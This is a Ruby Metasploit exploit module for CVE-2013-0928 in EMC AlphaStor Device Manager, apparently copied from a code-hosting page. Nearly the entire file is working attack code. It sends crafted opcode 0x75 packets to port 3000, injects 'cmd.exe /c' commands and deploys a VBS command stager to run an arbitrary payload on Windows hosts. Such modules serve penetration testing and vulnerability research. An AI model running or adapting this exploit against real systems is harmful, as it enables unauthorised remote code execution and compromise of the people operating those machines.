121 lines
No EOL
3.1 KiB
Ruby
Executable file
121 lines
No EOL
3.1 KiB
Ruby
Executable file
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Exploit::CmdStager
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
|
|
'Description' => %q{
|
|
This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
|
|
command, the process does not properly filter user supplied input allowing for arbitrary
|
|
command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
|
|
with Windows 2003 SP2 and Windows 2008 R2.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
|
|
'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module
|
|
'Mohsan Farid <faridms[at]gmail.com>', # msf module
|
|
'Brent Morris <inkrypto[at]gmail.com>', # msf module
|
|
'juan vazquez' # convert aux module into exploit
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
['CVE', '2013-0928'],
|
|
['ZDI', '13-033']
|
|
],
|
|
'Platform' => 'win',
|
|
'Arch' => ARCH_X86,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 2048,
|
|
'DisableNops' => true
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]
|
|
],
|
|
'CmdStagerFlavor' => 'vbs',
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Jan 18 2013'))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(3000)
|
|
], self.class )
|
|
end
|
|
|
|
def check
|
|
packet = "\x75~ mminfo & #{rand_text_alpha(512)}"
|
|
res = send_packet(packet)
|
|
if res && res =~ /Could not fork command/
|
|
return Exploit::CheckCode::Detected
|
|
end
|
|
|
|
Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
def exploit
|
|
execute_cmdstager({ :linemax => 487 })
|
|
end
|
|
|
|
def execute_command(cmd, opts)
|
|
padding = rand_text_alpha_upper(489 - cmd.length)
|
|
packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
|
|
connect
|
|
sock.put(packet)
|
|
begin
|
|
sock.get_once
|
|
rescue EOFError
|
|
fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
|
|
end
|
|
disconnect
|
|
end
|
|
|
|
def execute_cmdstager_begin(opts)
|
|
if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/
|
|
cmd_list.each do |cmd|
|
|
cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
|
|
end
|
|
end
|
|
end
|
|
|
|
def send_packet(packet)
|
|
connect
|
|
|
|
sock.put(packet)
|
|
begin
|
|
meta_data = sock.get_once(8)
|
|
rescue EOFError
|
|
meta_data = nil
|
|
end
|
|
|
|
unless meta_data
|
|
disconnect
|
|
return nil
|
|
end
|
|
|
|
code, length = meta_data.unpack("N*")
|
|
|
|
unless code == 1
|
|
disconnect
|
|
return nil
|
|
end
|
|
|
|
begin
|
|
data = sock.get_once(length)
|
|
rescue EOFError
|
|
data = nil
|
|
ensure
|
|
disconnect
|
|
end
|
|
|
|
data
|
|
end
|
|
|
|
end |